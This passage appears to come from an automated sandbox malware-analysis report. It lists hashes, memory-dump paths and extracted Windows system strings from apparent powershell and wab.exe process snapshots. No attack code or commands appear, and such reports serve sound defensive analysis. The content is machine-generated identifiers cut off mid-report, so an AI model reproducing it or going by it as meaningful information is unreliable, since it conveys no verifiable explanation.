                                          • Opcode ID: 2dd06dd9d23ecc21c6752a5075287e46d86b316956507542e3ccf1dfd3468dee
                                          • Instruction ID: 3df64b116dba84c2e27413de0a8cda399ec33dd97263b829c4839ca2da9c3e9b
                                          • Opcode Fuzzy Hash: 2dd06dd9d23ecc21c6752a5075287e46d86b316956507542e3ccf1dfd3468dee
                                          • Instruction Fuzzy Hash: 02015A30A04208DFDB259FE0D955AAEBFB2FF5431AF21042AF102AB294DB755881DF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 20187799c7f065a571bb26f575df096740aff7a3b40dfc7f7e3878a8c2c5675e
                                          • Instruction ID: 90ea0691a58feaf41edb61b28856f684957f4a2c3e9371c9c083da1d04101579
                                          • Opcode Fuzzy Hash: 20187799c7f065a571bb26f575df096740aff7a3b40dfc7f7e3878a8c2c5675e
                                          • Instruction Fuzzy Hash: 9E017C30A00209DFDB259BE0C926AAEBBB6FF54307F21401AF502AB244DB795C42DF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3a612d896a7b6915fc4ec1d70926afab312ba2a9401a7e4ae601fe40723431b6
                                          • Instruction ID: d25a688713697cd5279ad8be8bd20d2884749c814ace71d7d8bb467c631d022a
                                          • Opcode Fuzzy Hash: 3a612d896a7b6915fc4ec1d70926afab312ba2a9401a7e4ae601fe40723431b6
                                          • Instruction Fuzzy Hash: CFF0F6316012918FC3158614DA08FA67BA4EBC6B99B0A55AEE449CB252CB34DC47D750
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 486000159cc5a3ee5e408937c04296a9ed31e0aa7279dc6980b9e43c2df21440
                                          • Instruction ID: cf022241afa2822bb19d31ca844bb764db9b527e5df495d1bde7c18e6ba46454
                                          • Opcode Fuzzy Hash: 486000159cc5a3ee5e408937c04296a9ed31e0aa7279dc6980b9e43c2df21440
                                          • Instruction Fuzzy Hash: 79F0F9786012059FD704CB58D994EAAF7B5FF8D314B2081A9D90A977A1C736EC53CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f49b2de0681ef2816d9d7862f6434e4623e77920060f5f901f63461b3bff2c16
                                          • Instruction ID: 808ceb5e126183cb2a3c2b29352228d33ede52ca56d29050ea9e5b515bfab2cc
                                          • Opcode Fuzzy Hash: f49b2de0681ef2816d9d7862f6434e4623e77920060f5f901f63461b3bff2c16
                                          • Instruction Fuzzy Hash: 37F04F30A04209DFDB15DBE0C965ABEBB31FFA034AF21451AF102AB286DB755C45DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a0b36d170507653aa1795dd3a0270e4f27b387e46c0d0b807acd4a25f1999e1f
                                          • Instruction ID: 6b31b1b64ee1304e4fe400a9ae3d25f2b4935257ac577f5e0cbf7a8f82a0c65d
                                          • Opcode Fuzzy Hash: a0b36d170507653aa1795dd3a0270e4f27b387e46c0d0b807acd4a25f1999e1f
                                          • Instruction Fuzzy Hash: 8FF01434A01109DFDB25DBE0D92AAAEBFB6FB98302F204129F502AB255DB345D01DF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d7f6cfc2d421a8b0ba7e258dca8c3dae17e390c0bc232f07c64d6703e3b518bc
                                          • Instruction ID: 7b91c86fe2eb46f7934d1be01fe35ba19cd1bad176a46be523d92b309b67918c
                                          • Opcode Fuzzy Hash: d7f6cfc2d421a8b0ba7e258dca8c3dae17e390c0bc232f07c64d6703e3b518bc
                                          • Instruction Fuzzy Hash: C5F04931901209DFDB619FE0D925AAEBFB6FF68302F24401AF602EB255DB744801DF92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f0d72fc261cbac0582c129ad381c233df013fa4741ec24aca786a2717afe5fa
                                          • Instruction ID: b4d5296981d41d28cc1acdaa19e2200aaeb3a44323d31ccef302df8a88048e88
                                          • Opcode Fuzzy Hash: 0f0d72fc261cbac0582c129ad381c233df013fa4741ec24aca786a2717afe5fa
                                          • Instruction Fuzzy Hash: DCF03734900209DFDB619BE0D919AAEBFB6FF58306F204019F502AB245DB744841DF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 26f86525f8e6068113c585019380b18e6b92b4d1d1848d7e5d1c8db62044b35a
                                          • Instruction ID: e300a0959b7060e072c99ed4886c2b876f7c2381cb17eaba46ae6be8aca149ff
                                          • Opcode Fuzzy Hash: 26f86525f8e6068113c585019380b18e6b92b4d1d1848d7e5d1c8db62044b35a
                                          • Instruction Fuzzy Hash: EAF01D75A001059FDB05CB88D890EFEF776FF88324F148159E915A73A0C732AC52CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0acde8a0728eb8ca649f6f172f6da9d94179265931c24325de9c27343f68f9ea
                                          • Instruction ID: e2f097e4c35f27f36a7c15104e32c4d39de0891c92e1f9545e93c71cb6688675
                                          • Opcode Fuzzy Hash: 0acde8a0728eb8ca649f6f172f6da9d94179265931c24325de9c27343f68f9ea
                                          • Instruction Fuzzy Hash: 93F06731A01209DFDB119BE0D92AAAEBFB6FF68302F204016F602EB254DB744C01DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1ac23508a0a8791b5eec8ab73357b577b38b57c740cfdd78d5437fcf6a9f0ff3
                                          • Instruction ID: b976ee9be10da9ddf9ca827ca1ca3149519b94d8cb76749166938503a0d1010d
                                          • Opcode Fuzzy Hash: 1ac23508a0a8791b5eec8ab73357b577b38b57c740cfdd78d5437fcf6a9f0ff3
                                          • Instruction Fuzzy Hash: 9DF06734900209DFDB219BE0D92AAAEBF76FF68302F204019F502EB244DB344841DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 45a372736204b476ffe0b0a5c965b127d9e4ad7e1b8769be114359a5c8a07ee7
                                          • Instruction ID: f3aa55fc999881ec4c906c6de1800aca782ce4073b851b7e4f27862ce175c46d
                                          • Opcode Fuzzy Hash: 45a372736204b476ffe0b0a5c965b127d9e4ad7e1b8769be114359a5c8a07ee7
                                          • Instruction Fuzzy Hash: 78F0A974E0020A8FC780DF68C485AAEBBF1BF49314F504199D509DB321D730A955CBD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1914564555.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_fc0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c8420c3cc59fe89320c233d0548c8595ee5a9315d795a88ed32d09d61f27bf14
                                          • Instruction ID: d52088f4812d4c722ef51a71a6c66bcb7f3f3a2701451e50099816391bd1602c
                                          • Opcode Fuzzy Hash: c8420c3cc59fe89320c233d0548c8595ee5a9315d795a88ed32d09d61f27bf14
                                          • Instruction Fuzzy Hash: 6EE068313007001FC304E778E485AEA33A2DFC9300B004026E101CB644CF74EC028BE2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f78431c023fd04fb184bb0e11ff77c55d57b7382804e653cccfec9e4e41e9621
                                          • Instruction ID: cf7fb75b5fc50a3549aab4e46e0f70c96cebb9f0486787353be43a10ee013e7c
                                          • Opcode Fuzzy Hash: f78431c023fd04fb184bb0e11ff77c55d57b7382804e653cccfec9e4e41e9621
                                          • Instruction Fuzzy Hash: 94F0ED34A0020DDFDB11DBD0D926AAFBBB2FF68306F204009F502AB285DB784D46DB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ec85ecb99822d909be1e179bdda993e15963d59019c2d370dcdf6a28fbd66e34
                                          • Instruction ID: 2b001628f1ef76c25b8dc6c144291899775ecdcd3555cb52f06d8f2929b8ccdf
                                          • Opcode Fuzzy Hash: ec85ecb99822d909be1e179bdda993e15963d59019c2d370dcdf6a28fbd66e34
                                          • Instruction Fuzzy Hash: 5AF0A934A00209DFDB11DBD0D966AAFBB72FF68306F208009F502AB245DB784D06DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a4361890f551d68f66d0e2ab34b20b0af9ccd7d9e66f9dfa840c90b6bde27f6f
                                          • Instruction ID: 828931f89830ff42794e415bbdfcfc9c1911c8a3ada2d5c22c96b738ffbd7125
                                          • Opcode Fuzzy Hash: a4361890f551d68f66d0e2ab34b20b0af9ccd7d9e66f9dfa840c90b6bde27f6f
                                          • Instruction Fuzzy Hash: 06E0923454020DDFEB119BD0D965AAFBB35FF64307F204409F102AB145DB744805DB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c6e623563868da04ac08638db54cf0f8ab261905ff8c1ed62b951ffeb78e684f
                                          • Instruction ID: b02eb1d4f2af3bd2b39c2fd81d285decaddb0b1242e69fa06b1b7324ab7352d1
                                          • Opcode Fuzzy Hash: c6e623563868da04ac08638db54cf0f8ab261905ff8c1ed62b951ffeb78e684f
                                          • Instruction Fuzzy Hash: C0E09A3464020DDFEB119BD0D966AAFBB35FF24307F20440AF102AB245DB744805EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.1924878743.00000000084E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084E0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_84e0000_powershell.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40f95e8f86c44133e4bb4b556540624270473404b1b515323d14caf5a26ad8ac
                                          • Instruction ID: 8ad948098515f3e13c7231d44774af45fd058d0bf1160e599d6c5806f056526c
                                          • Opcode Fuzzy Hash: 40f95e8f86c44133e4bb4b556540624270473404b1b515323d14caf5a26ad8ac
                                          • Instruction Fuzzy Hash: 3ED0927095520EDAEB159AC0D6257AFBAB1BB3424BF32480AE402B6241EBB44645D6A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:0%
                                          Dynamic/Decrypted Code Coverage:100%
                                          Signature Coverage:24.7%
                                          Total number of Nodes:93
                                          Total number of Limit Nodes:1

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 6 247035c0-247035cc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f6533c8120cd26fc8ed25f6f5ba67a0820f98e1e678c1c68bea593e8510dec84
                                          • Instruction ID: 63c6aefa3400894ad09f6c7fb54010c673485f6b6f04bfba6079c49be3911a12
                                          • Opcode Fuzzy Hash: f6533c8120cd26fc8ed25f6f5ba67a0820f98e1e678c1c68bea593e8510dec84
                                          • Instruction Fuzzy Hash: 3C90023165950403D2107158455470620055BD1205F66C412A0565538D8795CA5165A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 4 24702c70-24702c7c LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: fac6e52b20b01aa688c02922b8c7670003beca431305d40afd999bb3566c1bad
                                          • Instruction ID: 53283cb65f25324aa2d7eaf16e95ef12b8c599252a6a5585c075ad20d986ecb5
                                          • Opcode Fuzzy Hash: fac6e52b20b01aa688c02922b8c7670003beca431305d40afd999bb3566c1bad
                                          • Instruction Fuzzy Hash: 0D90023125548803D2207158844474A10055BD1305F5AC412A4565638D8795C9917121
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 5 24702df0-24702dfc LdrInitializeThunk
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b7a42a2316495d0fd1866da22df4603bf0f95e8789648b2c025fd638d04d319f
                                          • Instruction ID: 6c89d6b9b49c522c758fd326aaa9e298ee31866f387c2a3d5762094525d15258
                                          • Opcode Fuzzy Hash: b7a42a2316495d0fd1866da22df4603bf0f95e8789648b2c025fd638d04d319f
                                          • Instruction Fuzzy Hash: 9690023125540413D2217158454470710095BD1245F96C413A0565538D9756CA52A121
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 24702c0a-24702c0f 1 24702c11-24702c18 0->1 2 24702c1f-24702c26 LdrInitializeThunk 0->2
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 16c069d5fa904ca80c2f5351449933de6e63ada08e3f40a281074406a258d180
                                          • Instruction ID: d4738f12f6bee16767344c79d0ec2141b55aa6a8bf88a323b7a169ab8da534f8
                                          • Opcode Fuzzy Hash: 16c069d5fa904ca80c2f5351449933de6e63ada08e3f40a281074406a258d180
                                          • Instruction Fuzzy Hash: 01B09B729465C5C6D711E760460871779407BD1705F16C066D2170671F4738C5D5E175
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 628 246f8620-246f8681 629 24735297-2473529d 628->629 630 246f8687-246f8698 628->630 629->630 631 247352a3-247352b0 GetPEB 629->631 631->630 632 247352b6-247352b9 631->632 633 247352d6-247352fc call 24702ce0 632->633 634 247352bb-247352c5 632->634 633->630 640 24735302-24735306 633->640 634->630 635 247352cb-247352d4 634->635 637 2473532d-24735341 call 246c54a0 635->637 643 24735347-24735353 637->643 640->630 642 2473530c-24735321 call 24702ce0 640->642 642->630 651 24735327 642->651 645 24735359-2473536d 643->645 646 2473555c-24735568 call 2473556d 643->646 649 2473538b-24735401 645->649 650 2473536f 645->650 646->630 656 24735403-24735435 call 246bfd50 649->656 657 2473543a-2473543d 649->657 653 24735371-24735378 650->653 651->637 653->649 655 2473537a-2473537c 653->655 658 24735383-24735385 655->658 659 2473537e-24735381 655->659 670 2473554d-24735552 call 2474a4b0 656->670 661 24735443-24735494 657->661 662 24735514-24735517 657->662 658->649 664 24735555-24735557 658->664 659->653 667 24735496-247354cc call 246bfd50 661->667 668 247354ce-24735512 call 246bfd50 * 2 661->668 662->664 665 24735519-24735548 call 246bfd50 662->665 664->643 665->670 667->670 668->670 670->664
                                          Strings
                                          • undeleted critical section in freed memory, xrefs: 2473542B
                                          • Critical section address, xrefs: 24735425, 247354BC, 24735534
                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 247354E2
                                          • double initialized or corrupted critical section, xrefs: 24735508
                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 2473540A, 24735496, 24735519
                                          • Address of the debug info found in the active list., xrefs: 247354AE, 247354FA
                                          • 8, xrefs: 247352E3
                                          • Critical section address., xrefs: 24735502
                                          • Thread is in a state in which it cannot own a critical section, xrefs: 24735543
                                          • Invalid debug info address of this critical section, xrefs: 247354B6
                                          • corrupted critical section, xrefs: 247354C2
                                          • Thread identifier, xrefs: 2473553A
                                          • Critical section debug info address, xrefs: 2473541F, 2473552E
                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 247354CE
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                          • API String ID: 0-2368682639
                                          • Opcode ID: fd4fc4301495fbae6fb346e9c7c97f325682090be3383091f2d2a19bc09269c2
                                          • Instruction ID: 27b9f11d175fdd0a99c28ab1f93609d167633c76a5f4ad0886301e66a9a3d151
                                          • Opcode Fuzzy Hash: fd4fc4301495fbae6fb346e9c7c97f325682090be3383091f2d2a19bc09269c2
                                          • Instruction Fuzzy Hash: 69817BB1A00668AFDB10CF96C884FAEBBB5FB08714F204159F515B7241D375AD44CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          • @, xrefs: 246BD2AF
                                          • @, xrefs: 246BD0FD
                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 246BD196
                                          • H/n$, xrefs: 2471A843
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 246BD2C3
                                          • @, xrefs: 246BD313
                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 246BD262
                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 246BD0CF
                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 246BD146
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$H/n$$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                          • API String ID: 0-2595481613
                                          • Opcode ID: e4cbde0ef62207c5fca53646e21441ef4f0044f106b2c4d242cf572e1271671e
                                          • Instruction ID: 271c6eb73e10e535eb904f87e94022ff3d9062a80e28389d0a56794c588d266c
                                          • Opcode Fuzzy Hash: e4cbde0ef62207c5fca53646e21441ef4f0044f106b2c4d242cf572e1271671e
                                          • Instruction Fuzzy Hash: 55A15E715083459FE321CF25C484B5BBBE8BB94765F00892EF698AB241E774DA48CF93
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                          • API String ID: 0-3063724069
                                          • Opcode ID: 0e9c28b572ff55607b41eed42a0c9835348d17ee406856fc02f45a74d552af36
                                          • Instruction ID: 8eb1ff484dcbf7ccbe8cc0ee552f8c4093350f19ebe5953203bf177ab376d717
                                          • Opcode Fuzzy Hash: 0e9c28b572ff55607b41eed42a0c9835348d17ee406856fc02f45a74d552af36
                                          • Instruction Fuzzy Hash: 13D1C6F2805711AFD721CB54C880B6BBBE8AF94754F404969FE64AB360E770CD4887D2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_12_2_24690000_wab.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 0-1700792311
                                          • Opcode ID: d3686b52ae1fabcb034d2db6dc8e38dd8fd01e65d96cdd771348c1917472cc46
                                          • Instruction ID: 2866e15f1fdbbc864f3618025fb15e1dc925a1f32d2a343ff36091f1f7e7c9bb
                                          • Opcode Fuzzy Hash: d3686b52ae1fabcb034d2db6dc8e38dd8fd01e65d96cdd771348c1917472cc46
                                          • Instruction Fuzzy Hash: C0D1EB31600685EFDF06CF69C494AA9BBF1FF5A710F888059E8A5AB752C734E980CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000C.00000002.2286364866.0000000024690000.00000040.00001000.00020000.00000000.sdmp, Offset: 24690000, based on PE: true
                                          • Associated: 0000000C.00000002.2286364866.00000000247B9000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.00000000247BD000.00000040.00001000.00020000.00000000.sdmp
                                          • Associated: 0000000C.00000002.2286364866.000000002482E000.00000040.00001000.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
